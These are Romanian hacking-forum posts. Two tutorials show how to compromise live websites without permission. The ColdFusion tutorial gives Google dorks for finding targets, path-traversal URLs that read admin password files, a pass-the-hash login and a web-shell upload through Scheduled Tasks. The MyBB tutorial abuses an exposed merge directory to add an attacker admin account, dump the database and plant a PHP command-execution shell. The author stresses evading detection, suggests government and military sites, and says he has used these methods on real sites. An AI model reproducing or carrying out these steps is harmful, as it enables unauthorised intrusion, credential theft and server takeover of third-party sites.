MarAnd

Pana la urma, de 2$ sau de 10$ ai nevoie?

Acest tutorial va ofera o idee generala asupra exploatarii un site pe platforma ColdFusion. Exista multe site-uri de mare interes, cum ar fi guvernamentale si militare, care folosesc aceasta platforma, dar nu toate sunt vulnerabile. Sa incepem! Necesitati Anonimizare - Nu faceti asa ceva fara sa fiti siguri ca nu veti fi prinsi. JavaScript Snippet - Inclus in tutorial. Tamper Data - Firefox (TOR) Plugin Gasirea unui site vulnerabil Aceasta este o parte simpla, trebuie doar sa folosim un dork Google. ext:cfm Testarea pentru vulnerabilitate Primul pas este sa accesam panoul de control, care se gaseste in directorul: http://site/random/directories/shit/lol/document.cfm Apoi: http://site/CFIDE/administrator Daca panoul exista, si avem acces la el, vom fi intampinati de urmatoarea pagina: http://i.imgur.com/Oz9pwnk.jpg Acum, trebuie sa retinem versiunea de Adobe ColdFusion existenta pe site. Doar versiunile 6, 7 si 8 sunt vulnerabile la acest tip de atac. In cazul versiunilor 9 si 10, voi explica mai tarziu. Acum ca am gasit o versiune vulnerabila, care este urmatorul pas? Va trebui sa folositi exploiturile de mai jos, depinzand de versiune. Tineti mine ca acest pas trebuie facut in 30 secunde maxim, deoarece saltul se schimba odata la 30 secunde. Versiunea 6 http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en Versiunea 7 http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en? Versiunea 8 http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e?n Daca exploatarea are loc cu succes, atunci veti vedea parola tip hash a administratorului. Versiunile 9 si 10 In cazul acestor versiuni va trebui sa instalati Python. Acest tutorial depinde de sistemul nostru de operare, aici eu voi folosi Windows, poate in viitor voi adauga si pentru versiunea Linux. Mai intai, instalati Python si apoi Python Requests (Requests: HTTP for Humans — Requests 2.3.0 documentation). Apoi salvati urmatorul script pe desktop, cu numele a.py: ColdFusion 9-10 - Credential Disclosure Exploit Acum deschideti linia de comanda si scrieti urmatoarele comenzi, in ordine: cd desktop a.py Asta ar trebui sa ruleze scriptul. Acum trebuie sa introduceti URL-ul, nu scrieti si directorul /CFIDE/ dupa el. Doar URL-ul, de exemplu: http://vulnerable.com Daca primiti urmatoarea eroare, site-ul nu este vulnerabil: Daca este vulnerabil, veti primi un raspuns de la scriptul HMAC, si puteti trece la urmatorul pas! Logarea folosind o parola hashuita Acum vine partea tricky! Va trebui sa fiti siguri ca aveti scripturile activate (daca folositi NoScript) - Introduceti urmatorul cod javascript in browser - desi functioneaza mai bine daca folositi Scratchpad (Shift + F4 pentru Firefox / Ctrl + Alt + N pentru Chrome): javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.?cfadminPassword.value)) NOTA: DACA FOLOSITI SCRATCHPAD NU INCLUDETI SI "javascript:" IN COD, DEOARECE NU VA FUNCTIONA. Veti primi o alerta cu hashul HMAC-uit. Copiati acest string. Apoi, deschideti Tamper Data, apasati "Start Tamper" si apoi apasati login, si dati paste hashului obtinut din scriptul javascript in fieldul cfadminPassword. Introducerea unui shell Veti avea nevoie de un Shell Adobe ColdFusion. Puteti incerca un shell regular de tip PHP sau ASP, dar de obicei acestea sunt blocate. Nu am reusit sa gasesc acest shell altundeva, deci se poate spune ca e privat: http://1drv.ms/1bTIcji Salvati-l pe PC, sub forma de numefisier.cfm, pentru a avea acces la el usor de acum. Aici vine partea de shelling cu adevarat. Odata ce sunteti intrati in panoul de administrare al ColdFusion, duceti-va la sectiunea "Settings Summary" in stanga, apoi sectiunea "Mappings". Acesta pagina va arata intregul director al locatiei CFIDE. De obicei, este /CFIDE. Aici veti introduce shellul, deoarece aceasta este partea unde va aflati momentan. Copiati aceasta locatie pana la punctul unde scrie /CFIDE. Apoi, duceti-va la tabul "Debugging and Logging" in stanga si apasati "Scheduled Tasks". Aceasta optiune ne da voie sa rulam un task pe site (in cazul nostru, uploadarea shellului). Apasati "Schedule New Task". Puneti-i un oarecare nume, nu conteaza, daca vreti sa ramaneti nedescoperiti puneti ceva de genul "Scheduled Configuration". Acum, schimbam partea de URL a paginii catre sursa raw a shellului, de asta am si urcat documentul ca plain text. Salvati deci acel fisier. Dati paste pathului copiat in pasul anterior in fieldul "File". Introduceti numele cu care doriti sa il salvati, cu extensia .cfm. Deci, deoarece suntem in directorul /CFIDE/, ar fi bine sa il numiti ceva de genul confg.cfm. Verificati de doua ori ca ati efectuat toti pasii corect in conformitate cu acest tutorial, apoi apasati "OK". Atunci cand pagina de reincarca, apasati tickul verde pentru a rula taskul. Acesta va uploada shellul! Daca toti pasii au fost urmati corect, veti avea acces la shell: http://yourhackedsite.com/CFIDE/yourshellname.cfm Va trebui sa introduceti detaliile de login. Daca nu le-ati modificat, ele sunt urmatoarele: RSTForums - tutorial a.py -> Subzero b.py -> Python 1-liner pentru HMAC/Salt Succes!

Aceasta metoda functioneaza in cadrul platformei MyBB, am folosit-o si eu cu succes pe cateva site-uri, desi nu este chiar o vulnerabilitate ci mai degraba tine de prostia administratorului site-ului. Ce va ofera acest tutorial? Un ghid avansat despre cum puteti exploata un forum MyBB prin Open Merge Directory O metoda prin care puteti uploada un shell odata ce sunteti in interiorul panoului de administrare MyBB O baza de date actualizata continand un utilizator de admin pentru platforma MyBB Primii pasi Mai intai, descarcati urmatorul fisier SQL: http://1drv.ms/1bScHpY Apoi, creati un cont pe un website ce va permite importarea unei baze de date, de exemplu db4free.net - get a MySQL 5.6 Database for free, apoi logati-va in phpMyAdmin, selectati fisierul de mai sus, dupa care importati-l. Baza de date contine un cont de administrator in grupul SECONDARY, din motive de siguranta, ca sa nu fiti vazuti online pe forum. Parola default a contului este "ballsack". Acum, trebuie sa gasiti un forum care are directorul pentru merge deschis. Metoda mea favorita este sa intru in folderul meu Spam din mail si sa gasesc mesajele de gen "bla bla forum", prin care stiu ca nu m-am inregistrat pe acel forum. Odata ce ati gasit unul, accesati directorul /merge/ si vedeti daca functioneaza. Totusi, putem fi mai profesionisti si sa folosim dorkuri pentru a gasi acest director merge, pe forumuri la intamplare. Un exemplu bun este: intext:"MyBB Merge System - Version:" inurl:"/merge" Exploatarea directorului merge Odata ce ati gasit un website cu acest director deschis, veti fi intampinati de urmatoarea pagina: Apasati pe "Next". Asigurati-va ca cele doua fisiere au permisiunea de a fi scrise, si apoi apasati din nou "Next". Acum selectati "MyBB 1.6 (Merge)", si din nou apasati "Next". In cadrul paginii Database Configuration, apasati "Run" si veti fi directionati catre o pagina asemanatoare cu: Aici intervine acea baza de date, mai exact veti avea nevoie de detaliile de la db4free.net ; introduceti informatiile (hostul este db4free.net) ca in poza, dar desigur inlocuiti informatiile cu cele ale dvs: Verificati ca detaliile sa fie introduse corect si apasati din nou pe "Next". Acum, selectati optiunea Usergroups, apoi, dupa ce ati completat-o si pe aceea, selectati optiunea "Users". In cadrul acesteia, veti avea o pagina asemanatoare cu: Aici nu va exista nicio problema, deoarece avem doar un singur user nu va trebui sa schimbam vreo setare, deci pur si simplu selectam "Next". Gata! Acum am unit cu succes utilizatorul nostru de form. Nu incercati optiunea merge si pentru alte lucruri, deoarece ar fi fara rost. In schimb, navigati in josul paginii si apasati "Cleanup". Nu va ingrijorati despre pagina "Completition", pur si simplu duceti-va inapoi pe forum si logati-va cu detaliile utilizatorului. Dupa cum puteti vedea, pe forum aparem ca un simplu utilizator: Descarcarea in mod corect a bazei de date Exista un feature in platforma MyBB care ne permite sa descarcam bazele de date direct din ACP. Duceti-va la tabul "Tools and Maintenance", apoi selectati "Database Backups" din partea stanga. Apasati pe "New Backup". Vom avea ceva de tipul: Va trebui sa folositi optiunea "Select All", apoi sa schimbati tipul fisierului in Plain Text si sa apasati "Perform Backup", ca in imagine: Am terminat si acest pas, acum aveti o baza de date completa! Acesarea serverului din spatele MyBB Aceasta parte este una avansata, nu la fel de usoara ca si celelalte. Avem nevoie de pluginul forumului "Page Manager". Avem o problema insa, acest plugin nu ii ofera default oricarui administrator puterea de a il utiliza, ci numai super administratorului, dar vom trece peste aceasta limitare. Deci, sa urmam pasii. Duceti-va in prima pagina a panoului de administrare, selectati "Plugins" din lista din stanga. Cautati in lista si verificati daca "Page Manager" este instalat. Daca este, avem noroc! Acum duceti-va la tabul "Users & Groups", selectati "Admin Permissions". Selectati-va utilizatorul, apoi cautati in pagina textul "manage pages" si selectati "Yes". Acum salvati setarile facute, si aveti acces la page manager! Duceti-va la tabul "Forums & Posts" si selectati Page Manger din stanga. Acum creati o noua pagina, aveti grija ca ea sa nu fie afisata in forum, dar sa existe. Vom folosi urmatoarea comanda pentru a avea acces la o linie de comanda tip shell pe server: <?php $cmd = <<<EOD cmd EOD; if(isset($_REQUEST[$cmd])) { system($_REQUEST[$cmd]); } ?> Acest script pur si simplu face un request serverului cu comanda introdusa. Acum, duceti-va pe URL-ul creat, ar trebui sa fie ceva similar: http://hackedsi.te/misc.php?action=yourpage Acum, pentru a executa comenzi, trebuie sa folosim urmatorul URL (in acest exemplu, vom lista toate fisierele din directorul curent): http://hackedsi.te/misc.php?action=yourpage&cmd=ls _____________________________________________________________________________ Sper ca v-a placut tutorialul, astept comentariile si sugestiile voastre!

Salut, Numele meu este Marian, am 17 ani si ma ocup cu securitatea web. Am cunostinte in PHP, HTML si Retelistica, dar si in general de vulnerabilitati web. Am venit aici pentru a invata dar si pentru a imi impartasi cunostintele cu altii. O seara buna!